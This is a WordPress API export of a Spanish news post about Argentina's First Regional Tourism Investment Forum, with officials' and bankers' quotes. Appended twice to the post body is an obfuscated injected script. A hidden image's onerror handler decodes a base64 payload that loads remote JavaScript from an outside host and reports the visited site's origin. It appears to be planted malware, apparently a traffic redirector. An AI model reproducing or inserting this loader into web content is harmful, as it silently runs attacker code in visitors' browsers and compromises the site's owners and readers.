{"id":4525,"date":"2024-10-27T10:31:24","date_gmt":"2024-10-27T13:31:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4525"},"modified":"2025-08-13T23:46:45","modified_gmt":"2025-08-14T02:46:45","slug":"finalizo-exitosamente-el-primer-foro-regional-de-inversiones-turisticas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4525","title":{"rendered":"Finaliz\u00f3 exitosamente el Primer Foro Regional de Inversiones Tur\u00edsticas"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-text-color has-link-color wp-elements-742c9ddca395fa3c9727bd633140e89b\" style=\"color:#035d91\"><strong>\u201c<em>Argentina ha recuperado el protagonismo y se ha vuelto a insertar en el mundo gracias a las pol\u00edticas implementadas por el presidente Milei<\/em>\u201d, se\u00f1al\u00f3 el secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0Daniel Scioli.<\/strong><\/h4>\n\n\n\n<p>Con m\u00e1s de&nbsp;<strong>50 reuniones<\/strong>,&nbsp;<strong>400 participantes<\/strong>&nbsp;y representantes de&nbsp;<strong>m\u00e1s de 20 embajadas<\/strong>, finaliz\u00f3 el&nbsp;<strong>Primer Foro Regional de Inversiones Tur\u00edsticas<\/strong>, organizado en conjunto por la Secretar\u00eda de Turismo, Ambiente y Deportes de la Naci\u00f3n, la C\u00e1mara Argentina de Turismo y el Ente de Turismo de la Ciudad de Buenos Aires.<\/p>\n\n\n\n<p><strong>Daniel Scioli<\/strong>&nbsp;asegur\u00f3: \u201c<em>Todos concordamos en la importancia de generar incentivos para la inversi\u00f3n, con una estrategia que incremente los beneficios econ\u00f3micos a nivel regional, fortaleciendo el capital humano y la inteligencia de destinos<\/em>\u201d.<\/p>\n\n\n\n<p>Por \u00faltimo, reconoci\u00f3 que existe en el pa\u00eds \u201c<em>una realidad cada vez m\u00e1s provechosa para conseguir los objetivos propuestos: estabilidad econ\u00f3mica, seguridad, inflaci\u00f3n en baja, perspectivas de recuperaci\u00f3n en los mercados<\/em>\u201d. \u201c<em>Juntos pongamos al turismo al servicio del crecimiento de nuestro pa\u00eds<\/em>\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<p>La subsecretaria de Turismo de la Naci\u00f3n,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>, sostuvo que \u00ab<em>tenemos que lograr que vengan m\u00e1s turistas para que aquellos que inviertan, ganen. Tenemos que lograr que el Estado acompa\u00f1e y no ponga palos en la rueda. Las condiciones est\u00e1n dadas. Durante el Foro pudimos visibilizar todas las oportunidades que tiene Argentina. Este es el momento para invertir en el pa\u00eds mientras se mejora la macroeconom\u00eda, la posibilidad de financiamiento y la posibilidad de acceder a los mercados<\/em>\u00ab.<\/p>\n\n\n\n<p>El presidente de la C\u00e1mara de Turismo de Argentina,&nbsp;<strong>Gustavo Hani<\/strong>, expres\u00f3: \u201c<em>Desde la parte privada nos gusta mucho que haya mucho todav\u00eda por invertir<\/em>\u201d. \u201c<em>Creo que hay una gran oportunidad. Las condiciones actuales nos van a permitir que podamos seguir trabajando, invirtiendo, dando empleo y generando m\u00e1s infraestructura en las provincias<\/em>\u201d, manifest\u00f3<\/p>\n\n\n\n<p>Durante la jornada se realizaron dos ponencias magistrales a cargo del director Regional para las Am\u00e9ricas de ONU Turismo,&nbsp;<strong>Gustavo Santos<\/strong>; y de la gerente de Conocimiento del Banco de Desarrollo de Am\u00e9rica Latina y el Caribe (CAF),&nbsp;<strong>Ver\u00f3nica Frisancho<\/strong>. Los expertos internacionales ofrecieron un an\u00e1lisis sobre las tendencias y desaf\u00edos globales del turismo en la actualidad.<\/p>\n\n\n\n<p>Estas presentaciones brindaron una perspectiva estrat\u00e9gica sobre c\u00f3mo la inversi\u00f3n privada puede impulsar el crecimiento y la sostenibilidad del sector en Am\u00e9rica Latina. Se destac\u00f3 el financiamiento internacional para el desarrollo de proyectos tur\u00edsticos y la importancia de la colaboraci\u00f3n regional en la generaci\u00f3n de herramientas para fortalecer la promoci\u00f3n de inversiones en el sector p\u00fablico.<\/p>\n\n\n\n<p>Entre las conclusiones que present\u00f3&nbsp;<strong>Santos<\/strong>, marc\u00f3 como fundamental fomentar la inversi\u00f3n extranjera en proyectos tur\u00edsticos y adoptar una normativa desreguladora atraer\u00e1 inversi\u00f3n y har\u00e1 de Argentina un destino tur\u00edstico competitivo.<\/p>\n\n\n\n<p>Asimismo,&nbsp;<strong>Ver\u00f3nica Frisancho<\/strong>&nbsp;del CAF destac\u00f3 que \u201c<em>el turismo puede contribuir directa e indirectamente con la agenda de desarrollo sostenible, con el trabajo decente y el crecimiento econ\u00f3mico; la producci\u00f3n y el consumo responsable por su conexi\u00f3n con la preservaci\u00f3n de la biodiversidad y el medioambiente; y con la vida submarina. En ese sentido, el turismo se puede potenciar con una nueva cara, una cara m\u00e1s verde y una forma muy tangible de convertir la biodiversidad en fuente de riqueza<\/em>\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n se presentaron proyectos tur\u00edsticos privados que contaron sus experiencias y estrategias de \u00e9xito al generar valor econ\u00f3mico y social en sus respectivas comunidades, buscando inspirar sobre el impacto de la inversi\u00f3n privada en turismo.<\/p>\n\n\n\n<p>El presidente del Grupo Hotelero Albamonte, propietario de las marcas internacionales Howard Johnson y Days Inn,&nbsp;<strong>Alberto Albamonte<\/strong>, cont\u00f3 la experiencia de Howard Johnson Argentina. Hoy el grupo cuenta con \u201c<em>11 hoteles para abrir antes de julio del a\u00f1o que viene en el interior del pa\u00eds<\/em>\u201d y se\u00f1al\u00f3 que \u201c<em>generamos fuentes de trabajo, y capacitaci\u00f3n de alto nivel. Hoy empleamos 3.300 personas en nuestras cadenas de Argentina<\/em>\u201d.<\/p>\n\n\n\n<p>En el \u00e1mbito internacional, el jefe de Divisi\u00f3n de Fomento e Inversi\u00f3n de la Subsecretar\u00eda de Turismo de Chile,&nbsp;<strong>Leonardo Latorre Mart\u00edn<\/strong>, present\u00f3 la experiencia del pa\u00eds en materia de promoci\u00f3n de inversiones tur\u00edsticas p\u00fablicas y privadas, y las alianzas de cooperaci\u00f3n regional en la materia. Y destac\u00f3 que \u201c<em>Tenemos una ley de turismo creada en el 2010 que establece al turismo como una actividad prioritaria para que sea estrat\u00e9gica y sustentable<\/em>\u201d.<\/p>\n\n\n\n<p>En el 2020,&nbsp;<strong>Chile<\/strong>&nbsp;cre\u00f3 el Plan de Acci\u00f3n 2020-2025 para la atracci\u00f3n de inversiones tur\u00edsticas. Este plan tiene por objetivo incentivar las inversiones tur\u00edsticas para fomentar nuevos proyectos que potencian y diversifican los destinos tur\u00edsticos para dinamizar sus econom\u00edas regionales.<\/p>\n\n\n\n<p>Se realiz\u00f3 tambi\u00e9n una exposici\u00f3n de&nbsp;<strong>bancos internacionales<\/strong>&nbsp;con las opciones de acceso al financiamiento por parte de las pymes del sector privado tur\u00edstico y las herramientas de apoyo disponibles. Participaci\u00f3n de bancos nacionales p\u00fablicos mencionando las l\u00edneas de financiamiento existentes para el sector. Expusieron representantes del Banco Interamericano de Desarrollo (BID), del Banco de Desarrollo de Am\u00e9rica Latina y el Caribe (CAF), del Banco de Inversi\u00f3n y Comercio Exterior (BICE), y del Banco de la Naci\u00f3n Argentina (BNA).<\/p>\n\n\n\n<p>Desde&nbsp;<strong>Banco Interamericano de Desarrollo<\/strong>&nbsp;se\u00f1alaron que \u201c<em>la estrategia en el turismo implica incrementar beneficios econ\u00f3micos de turismo a nivel regional, fortalecer el capital humano y la inteligencia de destinos. Es importante generar incentivos para la inversi\u00f3n incorporando acciones socio ambientales y mejorando la competitividad del sector<\/em>\u201d.<\/p>\n\n\n\n<p>Asimismo, referentes del&nbsp;<strong>Banco de Desarrollo de Am\u00e9rica Latina y el Caribe (CAF)<\/strong>&nbsp;sostuvieron que \u201c<em>trabajamos con la gesti\u00f3n de recursos y financiamiento verde para el sector tur\u00edstico, pueden ser fondos de conocimiento y desarrollo. Y a trav\u00e9s de alianzas con ministerios e instituciones de la regi\u00f3n para que las gu\u00edas con informaci\u00f3n sean \u00fatiles para invertir en los pa\u00edses<\/em>\u201d.<\/p>\n\n\n\n<p>\u201c<em>Consideramos un sector estrat\u00e9gico y trabajamos para que la actividad tur\u00edstica siga creciendo. Hemos acompa\u00f1ado desarrollos hoteleros, parques tem\u00e1ticos y otros rubros de la cadena de valor tur\u00edstica<\/em>\u201d, manifestaron desde el&nbsp;<strong>BICE<\/strong>.<\/p>\n\n\n\n<p>Para finalizar el panel, el&nbsp;<strong>Banco Naci\u00f3n<\/strong>&nbsp;present\u00f3 las distintas l\u00edneas que abarcan diversas tem\u00e1ticas como el financiamiento de capital de trabajo, cr\u00e9ditos orientados a empresas, bienes de capital, veh\u00edculos, entre otros. El financiamiento abarca tambi\u00e9n hoteler\u00eda en proyectos de reconvenci\u00f3n y eficiencia energ\u00e9tica.<\/p>\n\n\n\n<p>Por \u00faltimo, se presentaron los incentivos y los inmuebles fiscales disponibles para el desarrollo de proyectos tur\u00edsticos en el pa\u00eds. Estos incentivos, dise\u00f1ados para atraer capital privado, son herramientas fundamentales para acelerar la inversi\u00f3n y el crecimiento sostenible del sector tanto en la escala nacional como regional. Presentaron propuestas la Ciudad Aut\u00f3noma de Buenos Aires y las provincias de C\u00f3rdoba, Chaco, Corrientes, Misiones, Catamarca, Jujuy, Salta, Santiago del Estero, Tucum\u00e1n, Mendoza, San Juan, San Luis, Chubut, Neuqu\u00e9n y Tierra&nbsp;del&nbsp;Fuego. La provincia de&nbsp;<strong>Mendoza<\/strong>&nbsp;se postul\u00f3 para ser sede de la pr\u00f3xima edici\u00f3n del Foro, el a\u00f1o que viene.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/finalizo-exitosamente-el-primer-foro-regional-de-inversiones-turisticas\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:252px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cArgentina ha recuperado el protagonismo y se ha vuelto a insertar en el mundo gracias a las pol\u00edticas implementadas por el presidente Milei\u201d, se\u00f1al\u00f3 el secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0Daniel Scioli. Con m\u00e1s de&nbsp;50 reuniones,&nbsp;400 participantes&nbsp;y representantes de&nbsp;m\u00e1s de 20 embajadas, finaliz\u00f3 el&nbsp;Primer Foro Regional de Inversiones Tur\u00edsticas, organizado en conjunto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4526,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20,21],"tags":[],"class_list":{"0":"post-4525","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4525"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4525"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4525\/revisions"}],"predecessor-version":[{"id":6655,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4525\/revisions\/6655"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4526"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4525"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4525"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4525"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}